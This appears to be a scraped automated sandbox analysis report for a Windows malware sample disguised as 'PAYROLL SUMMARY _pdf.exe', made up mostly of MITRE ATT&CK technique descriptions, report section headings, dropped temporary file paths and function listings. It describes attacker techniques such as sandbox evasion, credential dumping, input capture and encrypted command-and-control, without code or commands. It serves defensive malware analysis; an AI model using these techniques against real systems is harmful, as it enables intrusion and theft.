Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PAYROLL SUMMARY _pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\23802I71

C:\Users\user\AppData\Local\Temp\aut6A00.tmp

C:\Users\user\AppData\Local\Temp\aut6A3F.tmp

C:\Users\user\AppData\Local\Temp\emboweling

C:\Users\user\AppData\Local\Temp\overfertilize

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
PAYROLL SUMMARY _pdf.exe

Function 00253B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Function 00254FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62
COMMON

Function 00254AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 002B93DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00253015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Function 00253041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 002571EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00253633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Function 00253A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00253778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Function 0025F8CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Function 03DC25F0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 002539E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre